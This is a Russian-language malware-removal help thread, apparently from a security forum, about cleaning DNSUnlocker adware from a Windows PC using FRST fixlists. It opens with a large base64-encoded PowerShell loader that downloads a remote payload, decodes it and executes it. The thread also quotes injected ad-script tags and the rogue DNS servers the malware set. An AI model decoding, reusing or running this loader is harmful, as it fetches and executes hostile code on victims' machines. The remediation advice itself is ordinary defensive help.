AHIAbQBoAHMAcwB6AEMAVABBADYAVwB4AEEAaABDADIAbgBhAGkAMQBYAFQAZQBYAE4AegBxAE4AcQA4AGIAOAB4AGIAZQBDAHgAMgB3AHoASABtAEEAaABfAHIASgBzADQALQBfAEEAQQBkAGsAdABkAHgANgA5AGQAbAByAHcAcgBBAEIAWQA1AFYAZwAxAGIANABRAG0ARwBkAGgAagA2AGsAUwA0AGsAdwAwAEsAYgBMAFMAMQBKAGkAdwAwAFAANQBKAEQAMgBxAHYAeQB5ADIAQQBQAGkAQwBBAGEALQAyADUAdgBGAGQAVwBRAHQAcgBmADYARQBoADEATgAtADkAdgA3AEEASQBNAEMAQgBNAGQARABQAHAAWABZAEgAOQA1ADYARwBtAGQAUQBaAHQASABHAEQALQBrAEUAeQAyAEsAMAAzADMAQwBwAHMAMQBhAF8AagAyAE0AVwA2AHgANwBjADIAUABuADgARQAyAEUAagB6AFcARAB1AEsAaQBlADQAYgBCAHkAaAAtADMAUgBXAEMANQBJAEUAUQBnAEUAcABlAEEAVABPAGwANgBmAFoAOQBHAFYAbABYAHAAbwBKAFgAWAAtAHkAeQBJADkASQBvAHEATAAzAFEANABhAGsAbgBmAGcAQgBuAFEARwBmAEIAWQBTAEkASgBWAE0ARwBHAFoATQBGAFcAQQBFAGMANgBhAFgAdABqAG0AOABaAEcAdwAxAG0ASQBpAE4ATwBHAFMARwBFAGgAagBJAHUAMAAyADUAQgBxAGUAbQBNAEYAdABzAE4ASQBoADcAMQBRAFAAMQBZADgATgBHADcAVQBaAHgAUwBXAFAARQBUAEQAQgBrAGEAeQBEAFQAdABTAFoAdABwADUAZQBXAEEAUQBzAFkAWgBHAFEAMwB5AEYAcwA4AEwAbwB6AGYAYQBYAEcAUwBBAGQAXwBqAG4AWQB3ADYAMABmAFYARABMAC0AbQBmAFUARgBBAHIARABXAEEAUABJAE8AZwBoAF8AQQBJAGkASgBSAFQARwBTAGMAcABYAGcASAB4AE8AawBVAGcAagBGAGsAVQB2AFoASgA4AGgAMABLAGQAWABWAHMANQAzAE0ARABfADUAegBPAFYAbwBnAGoAQwByAEIAagAzAGgAWABwAF8AbgA3AFoANAAyADcAVgBjAGoAWQBvAGQAQQBxAFcAbQBtAGwAUwBCAE4AeABHAEoAWgBYAE4ASgBzAGEAZgBtAHMAZQBqADMAMwB3AE0AeABKAHgATwBsAHIANgBxAHoAUgBGADMAUgBUADAAVwBoAG8AMQBvAHAAcwBRAEUAZwBGAE4AMABSAEsAUQB6ADYAagBKAEgAdwBvAEQAVwBuAGoAcgBSAFIATgAzAG8AOAB3ADUAQwBzAE4ASwBlAGYAOAAxAG4AagBhAGEASQBwAEQAZQA3AFAAbQBKADEAcQAzAGsAZAAzAEMALQBNAEcAQgBXAEcASAB1AEYAMQBoADUAYQBTAGQAdQBRAHYAbABSAHIAbABsAGMATQAxAHYAagBDAEYAQwBjAGsAMwBXAEoAWgBnADAAUgB1AGYAMwBSAGgAQQBfADQAeQB3AHkARABQAGkATAAyAHkAQQAyAGgAcAB6AHEAZwBOAG8AdwA0ACYAYwA9AEgAMQBuAHkARwBaADYAYQBtAHEAaQBEADkANgAyAE4AeQA2AHUASgB2AFMAZwBhAG0AMwBLAEsAagBPADQAUQBCAEQAZgBsAGgAZwBJAEMAUwBiAFgANQBoAEkANABBAGoASwBUAEYAVgBiAFgAcQBLAEwASgBaAFcARgBOADEARgBTAEsAQQBiAEwATQBTAEgAbQBtAHoAcQBKAHgAVwBJAG8AMgBEAFQAUgBrAEoAUQBaAHUATgBjAFgAcgBuADcAbABoAEsAbAAwADEAMwByAGgARQBPAC0AQwBmAEIANgBZAFQAMwBmAGwATQBlAFYAUgBuAEEASQBCAGMAawA4ADQARQB3AG8AWgBjAHEANABRAEwATQB6AGcAaAAzAE8AMQA2AEgAUgBxAFEAVgBEAFYATgBjAHIAdQBmAC0ASAB2AEQAcQBSAHcAQQBpAFkAbgBZADkATgA4AC0AegB6AHgAWQBSAGIAVAB0AG4AMwByAF8ANwB5AF8AVAA1AFcAdABzAHMAdwB3AGwAbQBuAFgAZwBoAE4AQQA2AHEAYgBVADkAQwB0AHUAZwBQAHEANgBuAFQARgBNAEcAbQBiAFAAdwAxAFMANABNAFEAVQAyAEsAZgBEAGIANQBIADAAaQBmAGgAQwBNAEoAUQBQAFgAYwBIADMAcwB6AEsASABiAFoANgBiAHYAdgBfADkATQBUAHYAdgAyAHcAYgBHAE4AMABmAEYARwBXAGYAMABtADkAZgB3AEgAdQA0AGoAcgBUAEwAVwB3AHYAbwB1AHYAOAA1AFYAeQBLAEcAbwBjAFgAegBCAC0AMAAzAHcARwBGAHgASQBVAGEASQBrAFoARwBMAHYAQgBTAEkAdgB3AGsAbwBuAEEAcAB3AEwAYQBPAG0AbAAzAEcAUwBpAHkAcQBUADcATQB5AG0AcABFADkAVAA3AEwARwBDAEIAZABLAHQARgBzAEoAVQA4AGEAXwBSAEcAXwA0AGIAcgAxAHgAVABWAGIAcgBXAHMARABDADcATgA3AG0AdQBxAF8ASAAyAFkAcwBLAFYAcQBaADMAawB1AGYANwB3AF8ANgBYAEEAcgBCAHkAMwBiAEwAUwBhAHUAWABBADAAdgBtADEAOABaAGsALQBxADMARABtADEANABqAEEAZAAtADUAbgBhAGYAdwBYAEYAcQA2AGEAZgBVADEAZABHAF8AQwA2AHUASwBnAG4AQgBHAEkAawBNAE0AbQBQAG0AcwBuAEkAMABQADkAVgBVAHcAZwBqAFgAbQBDAEUAUwBIAGMAMQAxAGIAdgBqAGEAWgAtAEkAVwBIAEMAYgBvAE0AWQBVADIAWQBzAFgAZABMAEgAZAB5AHEAeABXAGsANwA4AEYASgBtAHoATgBJADAAVQAzAEEAaQB6AFMAZwB1AEUAYgBQAFIAdwBwAGcAdgA5AGQAMgA4AFgAZwBLAFoAVwB6AEcANQBlAEwATwA2AEIATgBSAEcAdgBGAGMAdwBpAFYANgBnAEUAVABGAEYAUwBvAHMANwBWAHkAUABXAEQASwBLADUAMgBIAEcAdQBMAHcAaQBWAFMAMwBmAFAAbABQAEkAXwBNAHkAcQByADIANwBUADAAWAB3AEEAMwBFAHYAYwAtAFAANgBxAFMAMQBHAHIAZgAxAC0AbABVAHAAaQBjAHUASAAtAHkAdwBxAGIAUAA3AGgAaQAzAEsAWQBfADkAQgB0AEIAWQAtAGUAbwA3AFQARwBxAFMAWgBWAHcAWABwAE8AMABWAEEAMQB2AG0AVQBLAGQATABsAFMAMQAyADgAeABtAE4AdQBiAGEARwBVADMAQwBoAGIAdABQAGQAcABFADYAawBvADQAYgAtAGYAeABKAFAAeQBXAFYAcgA0AEYAYgB2AGoASABDAE4ASgAtAHgAUQBpAEMAdwBCAG4AbwBjAF8AXwA0AHIAWgBzAGMAYgBIAHEAdABzAHMAYwBYAFUATQB5AHMATQBVAHQAcABhAGkATwBLAE8AYQBfAHkAYgBnAHYAUQBOAEEAdAA4AHAASgBYAE0AdwA2ADYATQBaADIAWABwAGQASwBBAGUAQQB4AG4AOQBMADcAdwBPAE0AWABjAFAAQQBtAHkATwBxAGYAegAwAHAARABiAG4ATQBDAEoAZABzAC0AXwBkAEgAUwBhAGYAUgBLAEoAbwBSAEMAeABmADMAJgByAD0AMgAwADUANgA0ADQANQA5ADgANQA3ADUANAAxADgAMgAwADIANAAiADsAJABzAHQAcwBrAD0AIgB7ADcAQQAwADgAMABCADQANwAtADcAOAAwADUALQAwADQAMABEAC0AMABEADEAMQAtADAAQgA3AEUANwBBADcAOAAxADEAMABCAH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAE4ASQBMAEwATgBOAEYAQgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQAgAH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABUAEIAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFQATABNAFIASwBRAFcAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACAAfQAKACQAcwBjAD0AVABMAE0AUgBLAFEAVwBDACgAVABCACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsACgB9ADsAZQB4AGkAdAAgADAAOwA=
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Вложения
Знакома ли Вам следующее:
Код:
========================= Folder: C:\ProgramData\SystemExplorer ========================
2016-02-20 21:20 - 2016-02-20 22:10 - 0009650 _____ () C:\ProgramData\SystemExplorer\config.ini
2016-02-20 21:24 - 2016-02-20 22:10 - 0246806 _____ () C:\ProgramData\SystemExplorer\data.sdb
====== End of Folder: ======
Заархивируйте следующие файлы в zip c паролем (virus):
Код:
C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
C:\WINDOWS\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\WINDOWS\bcastdvr\KnownGameList.bin
Также опишите как проявляется проблема?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
SystemExplorer - "прокачанный" диспетчер задач. Был установлен уже после появления проблемы, как раз с целью ее исправления (пытался через него посмотреть что лишнее болтается в памяти, безуспешно)
Проявление проблемы: "на пальцах": на любом сайте, при клике в любом месте(не обязательно по ссылке, возможно просто по тексту) происходит(или не происходит) одно или несколько событий:
1) открывается новое окно браузера, которое заходит на yxo.warmportrait.com/многобукв , а потом редиректится куда-нибудь
2) открывается новая вкладка браузера с рандомной рекламой
3) текущая вкладка браузера редиректится на рандомную рекламу.
После этого данной страницей можно нормально пользоваться.
На "битые" страницы в конец <body> дописывается много всякой дряни, например:
Код:
<script src="http://yxo.warmportrait.com/amz/aeyJhZmZpZCI6OTA5MCwic3ViYWZmaWQiOjMwMDAsInJldmVudWVzX2FmZmlkIjo5NTYwLCJyZXZlbnVlc19zdWJhZmZpZCI6MTAxMSwiaHJlZiI6Imh0dHA6Ly9ydS5kYXJrc291bHMud2lraWEuY29tL3dpa2kvJUQwJTkwJUQwJUJCJUQwJUI0JUQwJUI4JUQxJThGLF8lRDElODMlRDElODclRDAlQjUlRDAlQkQlRDElOEIlRDAlQjlfJUQwJTlGJUQwJUI1JUQxJTgwJUQwJUIyJUQwJUJFJUQxJTgwJUQwJUJFJUQwJUI0JUQwJUJEJUQwJUJFJUQwJUIzJUQwJUJFXyVEMCU5MyVEMSU4MCVEMCVCNSVEMSU4NSVEMCVCMCIsIndpZHRoIjoxMzY2LCJoZWlnaHQiOjc2OCwiZ2xidiI6Im8zYWQzMjg0NDkiLCJhZGRvbm5hbWUiOiJETlNVbmxvY2tlciJ9.js"></script>
<script async="" type="text/javascript" src="http://a.visadd.com/script/layer/serve?format=1&img=true&cid=layer_fr&isps=false&cbs=0.741785580990836&sid=14567722678&terms=bat%2C%20%u0432%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%2C%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%2C%20%u0432%u0441%u0435%u0445%2C%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B&httpsite=false&keywords=bat%2C%20%u0432%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%2C%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%2C%20%u0432%u0441%u0435%u0445%2C%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B&dm=virusinfo.info&charset=windows-1251&ttl=%u0412%u0441%u043F%u043B%u044B%u0432%u0430%u044E%u0449%u0438%u0435%20%u043E%u043A%u043D%u0430%20%u0438%20%u0440%u0435%u0434%u0438%u0440%u0435%u043A%u0442%u044B%20%u0432%u043E%20%u0432%u0441%u0435%u0445%20%u0431%u0440%u0430%u0443%u0437%u0435%u0440%u0430%u0445%20%28%u0437%u0430%u044F%u0432%u043A%u0430%20%u2116%20197359%29&adl=true&loc=http%3A//virusinfo.info/showthread.php%3Ft%3D197359%26p%3D1360285%23post1360285&dm=virusinfo.info&subid=55001&um=Powered by DNSUnlocker"></script>
dr web при заходе на такие страницы радостно репортит, что нашел
Код:
"Object";"Threat";"Action";"Path";
"welcome?pid=75041&said=55001&san=DNSUnlocker&met=1|0";"SCRIPT.Virus";"Заблокировано";"http://w3i.co/welcome?pid=75041&said=55001&san=DNSUnlocker&met=1|0";
Если его вырубить, то помимо вышеописанного
1) на страницы будут врезаться баннеры с подписью powered by dnsunlocker
2) некоторые слова на страницах будут преобразовываться в ссылки, предлагая искать эти слова в dns unlocker'e
Удалите вложение, также уточните проблема воспроизводиться во всех браузерах?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Google chrome+
microsoft edge -
Overwolf-Browser - (хотя до лечения он тоже был +)
Сообщение от
Владимир Самохин
Google chrome+
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{823dbb5e-7f96-4dd0-8c0d-b7643fcea65e}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{9228c73e-5fdf-4f30-9fd7-18faa83d658c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c062aa10-3e85-4d4e-b1bc-f3dccf78fda7}: [DhcpNameServer] 82.163.143.171
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
Очистите куки, кэш браузеров и кэш DNS (http://virusinfo.info/showthread.php?t=128635 )
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Вроде вылечилось. Спасибо!
Вложения